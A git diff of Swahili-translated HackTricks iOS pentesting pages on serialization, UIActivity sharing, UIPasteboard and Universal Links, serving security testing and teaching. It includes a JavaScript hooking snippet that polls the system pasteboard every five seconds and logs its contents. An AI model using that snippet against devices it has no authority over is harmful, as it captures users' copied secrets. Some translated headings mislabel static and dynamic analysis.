Njia hii inasaidia uwekaji wa data kwa njia rahisi kwenye orodha ya mali na JSON, ikiboresha usindikaji wa data kwenye programu za Swift.
Huu njia inasaidia serialization rahisi kutoka na kwenda kwenye orodha za mali na JSON, ikiboresha usimamizi wa data katika programu za Swift.
## Mbadala wa Uwekaji wa JSON na XML
Mbali na msaada wa asili, maktaba kadhaa za watu wa tatu zinatoa uwezo wa uwekaji/utoaji wa JSON na XML, kila moja ikiwa na sifa zake za utendaji na maswala ya usalama. Ni muhimu kuchagua maktaba hizi kwa umakini, hasa kwa kuzingatia kuzuiwa kwa hatari kama mashambulizi ya XXE (XML External Entities) kwa kusanidi wapanguzi ili kuzuia usindikaji wa entiti za nje.
### Maswala ya Usalama
Wakati wa uwekaji wa data, hasa kwenye mfumo wa faili, ni muhimu kuwa macho kuhusu uwezekano wa kuingizwa kwa habari nyeti. Data iliyowekwa, ikiwa itatekwa au kushughulikiwa vibaya, inaweza kufichua programu kwa hatari kama vitendo visivyoruhusiwa au uvujaji wa data. Inapendekezwa kusimbwa na kusaini data iliyowekwa ili kuimarisha usalama.
## Mbadala wa Uandishi wa JSON na XML
Mbali na msaada wa asili, maktaba kadhaa za upande wa tatu zinatoa uwezo wa uandishi/kuandika JSON na XML, kila moja ikiwa na sifa zake za utendaji na maelezo ya usalama. Ni muhimu kuchagua maktaba hizi kwa makini, hasa ili kupunguza udhaifu kama mashambulizi ya XXE (XML External Entities) kwa kuunda waandishi wa habari ili kuzuia usindikaji wa vitu vya nje.
### Maelezo ya Usalama
Wakati wa kuandika data, hasa kwenye mfumo wa faili, ni muhimu kuwa makini kuhusu uwezekano wa kujumuisha taarifa nyeti. Data iliyosajiliwa, ikiwa itakamatwa au kushughulikiwa vibaya, inaweza kufichua programu kwa hatari kama vitendo visivyoidhinishwa au uvujaji wa data. Inapendekezwa kuandika na kusaini data iliyosajiliwa ili kuboresha usalama.
## Marejeo
* [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

78
mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
View file

@ -1,78 +1,80 @@
# Kushiriki UIActivity
# iOS UIActivity Sharing
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Kushiriki UIActivity Imesanifishwa
# UIActivity Sharing Simplified
Tangu iOS 6 kuendelea, programu za watu wa tatu zimezawezeshwa kushiriki data kama vile maandishi, URL, au picha kwa kutumia mifumo kama AirDrop, kama ilivyoelezwa katika [mwongozo wa Mawasiliano ya Programu kwa Programu](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3) wa Apple. Kipengele hiki kinajitokeza kupitia karatasi ya shughuli ya kushiriki ya mfumo ambayo inaonekana baada ya kuingiliana na kifungo cha "Shiriki".
Kuanzia iOS 6 na kuendelea, programu za upande wa tatu zimewezeshwa **kushiriki data** kama vile maandiko, URLs, au picha kwa kutumia mitambo kama AirDrop, kama ilivyoelezwa katika mwongozo wa [Inter-App Communication](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3) wa Apple. Kipengele hiki kinaonekana kupitia _karatasi ya shughuli za kushiriki_ inayojitokeza unaposhughulika na kitufe cha "Share".
Orodha kamili ya chaguzi zote za kushiriki zilizojengwa tayari inapatikana kwenye [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Watengenezaji wanaweza kuchagua kuondoa chaguzi za kushiriki maalum ikiwa wanadhani hazifai kwa maombi yao.
Orodha kamili ya chaguo zote za kushiriki zilizojengwa ndani inapatikana kwenye [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Wataalamu wa programu wanaweza kuchagua kutengwa kwa chaguzi maalum za kushiriki ikiwa wanaona hazifai kwa programu yao.
## **Jinsi ya Kushiriki Data**
Umakini unapaswa kuwekwa kwenye:
Umakini unapaswa kuelekezwa kwa:
- Asili ya data inayoshirikiwa.
- Uingizaji wa shughuli za desturi.
- Aina ya data inayoshirikiwa.
- Kuongeza shughuli za kawaida.
- Kutengwa kwa aina fulani za shughuli.
Kushiriki kunawezeshwa kupitia kuanzisha `UIActivityViewController`, ambapo vitu vilivyokusudiwa kushirikiwa vinapitishwa. Hii inafanikiwa kwa kuita:
Kushiriki kunarahisishwa kupitia uundaji wa `UIActivityViewController`, ambapo vitu vinavyokusudiwa kushirikiwa vinapitishwa. Hii inafanywa kwa kuita:
```bash
$ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
0x1000df034 45 44 initWithActivityItems:applicationActivities:
```
Wabunifu wanapaswa kuchunguza `UIActivityViewController` kwa shughuli na shughuli za desturi ambazo imeanzishwa nazo, pamoja na aina zozote zilizotengwa za shughuli (`excludedActivityTypes`).
Developers should scrutinize the `UIActivityViewController` for the activities and custom activities it's initialized with, as well as any specified `excludedActivityTypes`.
## **Jinsi ya Kupokea Data**
Vipengele vifuatavyo ni muhimu wakati wa kupokea data:
Mambo yafuatayo ni muhimu unapopokea data:
- Tamko la **aina za hati za desturi**.
- Maelezo ya **aina za hati ambazo programu inaweza kufungua**.
- Uhakiki wa **usahihi wa data iliyopokelewa**.
- Tamko la **aina za hati za kawaida**.
- Mwelekeo wa **aina za hati ambazo programu inaweza kufungua**.
- Uthibitisho wa **uaminifu wa data iliyopokelewa**.
Bila kupata nambari ya chanzo, mtu bado anaweza kukagua `Info.plist` kwa funguo kama vile `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, na `CFBundleDocumentTypes` ili kuelewa aina za hati ambazo programu inaweza kushughulikia na kutangaza.
Bila ufikiaji wa msimbo wa chanzo, mtu anaweza bado kuchunguza `Info.plist` kwa funguo kama `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, na `CFBundleDocumentTypes` ili kuelewa aina za hati ambazo programu inaweza kushughulikia na kutangaza.
Mwongozo mfupi juu ya funguo hizi unapatikana kwenye [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), ukionyesha umuhimu wa kutaja na kuagiza UTIs kwa kutambuliwa kwa mfumo kwa ujumla na kuunganisha aina za hati na programu yako kwa ushirikiano katika mazungumzo ya "Fungua Kwa".
Mwongozo mfupi juu ya funguo hizi upatikana kwenye [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), ukisisitiza umuhimu wa kufafanua na kuagiza UTIs kwa kutambuliwa kwa mfumo mzima na kuunganisha aina za hati na programu yako kwa ajili ya ushirikiano katika mazungumzo ya "Fungua na".
## Njia ya Jaribio la Kudumu
## Njia ya Kujaribu ya Kijadi
Kwa kujaribu **shughuli za kutuma**, mtu anaweza:
Ili kujaribu **kutuma shughuli**, mtu anaweza:
- Kuingia kwenye njia ya `init(activityItems:applicationActivities:)` ili kuchukua vitu na shughuli zinazoshirikiwa.
- Kutambua shughuli zilizotengwa kwa kuingilia mali ya `excludedActivityTypes`.
- Kuunganisha kwenye njia ya `init(activityItems:applicationActivities:)` ili kukamata vitu na shughuli zinazoshirikiwa.
- Kutambua shughuli zilizotengwa kwa kukamata mali ya `excludedActivityTypes`.
Kwa **kupokea vitu**, inahusisha:
- Kushiriki faili na programu kutoka chanzo kingine (k.m., AirDrop, barua pepe) ambayo inaleta mazungumzo ya "Fungua na...".
- Kuingia kwenye njia ya `application:openURL:options:` pamoja na njia nyingine zilizotambuliwa wakati wa uchambuzi wa tuli ili kuona jibu la programu.
- Kutumia faili zilizoharibika au mbinu za fuzzing ili kutathmini uimara wa programu.
- Kushiriki faili na programu kutoka chanzo kingine (mfano, AirDrop, barua pepe) inayochochea mazungumzo ya "Fungua na...".
- Kuunganisha `application:openURL:options:` miongoni mwa njia nyingine zilizotambuliwa wakati wa uchambuzi wa statiki ili kuona majibu ya programu.
- Kutumia faili zisizo sahihi au mbinu za fuzzing ili kutathmini uimara wa programu.
## Marejeo
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

82
mobile-pentesting/ios-pentesting/ios-uipasteboard.md
View file

@ -1,56 +1,57 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
Kugawana data ndani na kati ya programu kwenye vifaa vya iOS kunarahisishwa na mbinu ya [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambayo imegawanywa katika makundi mawili makuu:
Kushiriki data ndani na kati ya programu kwenye vifaa vya iOS kunarahisishwa na mekanizma ya [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambayo imegawanywa katika makundi mawili makuu:
- **Ubao wa kunakili wa jumla kwa mfumo mzima**: Hii hutumiwa kugawana data na **programu yoyote** na imeundwa kudumu data hata baada ya kuanzisha upya kifaa au kuondoa programu, kipengele kilichopatikana tangu iOS 10.
- **Ubao wa kunakili wa desturi / wenye majina**: Hizi ni maalum kwa kugawana data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho cha timu sawa, na hazijabuniwa kudumu zaidi ya maisha ya mchakato wa programu inayounda, kufuatia mabadiliko yaliyoletwa katika iOS 10.
- **Pasteboard ya jumla ya mfumo**: Hii inatumika kwa kushiriki data na **programu yoyote** na imeundwa kudumisha data hata baada ya vifaa kuanzishwa upya na kufutwa kwa programu, kipengele ambacho kimekuwa kinapatikana tangu iOS 10.
- **Pasteboards za Kawaida / Zilizotajwa**: Hizi ni maalum kwa kushiriki data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho sawa cha timu, na hazijaundwa kudumisha zaidi ya maisha ya mchakato wa programu unaozizalisha, kufuatia mabadiliko yaliyoanzishwa katika iOS 10.
**Mambo ya kuzingatia kiusalama** yanacheza jukumu muhimu wakati wa kutumia ubao wa kunakili. Kwa mfano:
- Hakuna mbinu ya watumiaji kusimamia ruhusa za programu kupata **ubao wa kunakili**.
- Ili kupunguza hatari ya ufuatiliaji usioidhinishwa wa ubao wa kunakili, upatikanaji umefungwa wakati programu iko mbele (tangu iOS 9).
- Matumizi ya ubao wa kunakili wenye majina ya kudumu yanapendekezwa badala ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
- Kipengele cha **Ubao wa Kielelezo** kilicholetwa na iOS 10, kuruhusu yaliyomo kushirikiwa kati ya vifaa kupitia ubao wa jumla, kinaweza kusimamiwa na watengenezaji kuweka muda wa kumalizika kwa data na kulemaza uhamishaji wa yaliyomo kiotomatiki.
**Mambo ya usalama** yana jukumu muhimu wakati wa kutumia pasteboards. Kwa mfano:
- Hakuna mekanizma kwa watumiaji kudhibiti ruhusa za programu kufikia **pasteboard**.
- Ili kupunguza hatari ya ufuatiliaji usioidhinishwa wa nyuma wa pasteboard, ufikiaji umewekwa mipaka wakati programu iko mbele (tangu iOS 9).
- Matumizi ya pasteboards za kudumu zenye majina yanakabiliwa na kupuuziliwa mbali kwa ajili ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
- Kipengele cha **Universal Clipboard** kilichozinduliwa na iOS 10, kinachoruhusu maudhui kushirikiwa kati ya vifaa kupitia pasteboard ya jumla, kinaweza kudhibitiwa na wabunifu kuweka muda wa kuisha wa data na kuzima uhamishaji wa maudhui kiotomatiki.
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi kimakosa** kwenye ubao wa kunakili wa jumla ni muhimu. Aidha, programu zinapaswa kuundwa kuzuia matumizi mabaya ya data ya ubao wa kunakili wa jumla kwa hatua zisizokusudiwa, na watengenezaji wanahimizwa kutekeleza hatua za kuzuia kunakili wa taarifa nyeti kwenye ubao wa kunakili.
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi bila kukusudia** kwenye pasteboard ya ulimwengu ni muhimu. Zaidi ya hayo, programu zinapaswa kubuniwa ili kuzuia matumizi mabaya ya data ya pasteboard ya ulimwengu kwa vitendo visivyokusudiwa, na wabunifu wanahimizwa kutekeleza hatua za kuzuia kunakiliwa kwa taarifa nyeti kwenye clipboard.
### Uchambuzi Stahiki
### Uchambuzi wa Kijamii
Kwa uchambuzi stahiki, tafuta msimbo wa chanzo au binary kwa:
- `generalPasteboard` kutambua matumizi ya **ubao wa kunakili wa jumla kwa mfumo mzima**.
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **ubao wa kunakili wa desturi**. Thibitisha ikiwa kudumu kumewezeshwa, ingawa hii imepitwa na wakati.
Kwa uchambuzi wa kijamii, tafuta msimbo wa chanzo au binary kwa:
- `generalPasteboard` ili kubaini matumizi ya **pasteboard ya jumla ya mfumo**.
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **pasteboards za kawaida**. Thibitisha ikiwa kudumu kumewashwa, ingawa hii imeondolewa.
### Uchambuzi wa Kudumu
### Uchambuzi wa Kijamii
Uchambuzi wa kudumu unahusisha kufunga au kufuatilia njia maalum:
- Angalia `generalPasteboard` kwa matumizi ya mfumo mzima.
- Fuatilia `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa utekelezaji wa desturi.
- Angalia wito wa mbinu ya zamani ya `setPersistent:` kuthibitisha mipangilio ya kudumu.
Uchambuzi wa kijamii unahusisha kuunganisha au kufuatilia mbinu maalum:
- Fuata `generalPasteboard` kwa matumizi ya mfumo mzima.
- Fuata `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa utekelezaji wa kawaida.
- Angalia wito wa mbinu ya zamani `setPersistent:` ili kuangalia mipangilio ya kudumu.
Maelezo muhimu ya kufuatilia ni pamoja na:
- **Majina ya ubao wa kunakili** na **maudhui** (kwa mfano, kuchunguza herufi, URL, picha).
- **Idadi ya vitu** na **aina za data** zilizopo, kwa kutumia ukaguzi wa aina za data za kawaida na desturi.
- **Muda wa kumalizika na chaguzi za ndani-pekee** kwa kuchunguza njia ya `setItems:options:`.
- **Majina ya pasteboard** na **maudhui** (kwa mfano, kuangalia nyuzi, URLs, picha).
- **Idadi ya vitu** na **aina za data** zilizopo, ukitumia ukaguzi wa aina za data za kawaida na za kawaida.
- **Muda wa kuisha na chaguo za ndani pekee** kwa kukagua mbinu ya `setItems:options:`.
Mfano wa matumizi ya zana ya ufuatiliaji ni **ufuatiliaji wa ubao wa kunakili wa objection**, ambao unachunguza ubao wa kunakili wa jumla kila sekunde 5 kwa mabadiliko na kutoa data mpya.
Mfano wa matumizi ya zana ya kufuatilia ni **monitor ya pasteboard ya objection**, ambayo inachunguza generalPasteboard kila sekunde 5 kwa mabadiliko na kutoa data mpya.
Hapa kuna mfano rahisi wa skripti ya JavaScript, iliyochochewa na njia ya objection, kusoma na kurekodi mabadiliko kutoka kwenye ubao wa kunakili kila sekunde 5:
Hapa kuna mfano rahisi wa skripti ya JavaScript, iliyochochewa na mbinu ya objection, kusoma na kurekodi mabadiliko kutoka kwa pasteboard kila sekunde 5:
```javascript
const UIPasteboard = ObjC.classes.UIPasteboard;
const Pasteboard = UIPasteboard.generalPasteboard();
@ -74,7 +75,7 @@ console.log(items);
}, 1000 * 5);
```
## Marejeo
## References
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8)
* [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi)
@ -85,16 +86,17 @@ console.log(items);
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

73
mobile-pentesting/ios-pentesting/ios-universal-links.md
View file

@ -1,30 +1,31 @@
# Viungo vya Kisasa vya iOS
# iOS Universal Links
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Utangulizi
## Introduction
Viungo vya kisasa hutoa uzoefu wa **kuhamisha moja kwa moja** kwa watumiaji kwa kufungua moja kwa moja maudhui kwenye programu, bila haja ya kuhamishiwa kwa Safari. Viungo hivi ni **pekee** na salama, kwani haviwezi kudaiwa na programu nyingine. Hii inahakikishwa kwa kuwa na faili ya JSON ya `apple-app-site-association` kwenye saraka ya mizizi ya wavuti, kuanzisha kiungo kinachoweza kuthibitishwa kati ya wavuti na programu. Katika hali ambapo programu haijainstalled, Safari itachukua na kumwongoza mtumiaji kwenye ukurasa wa wavuti, ikiendeleza uwepo wa programu.
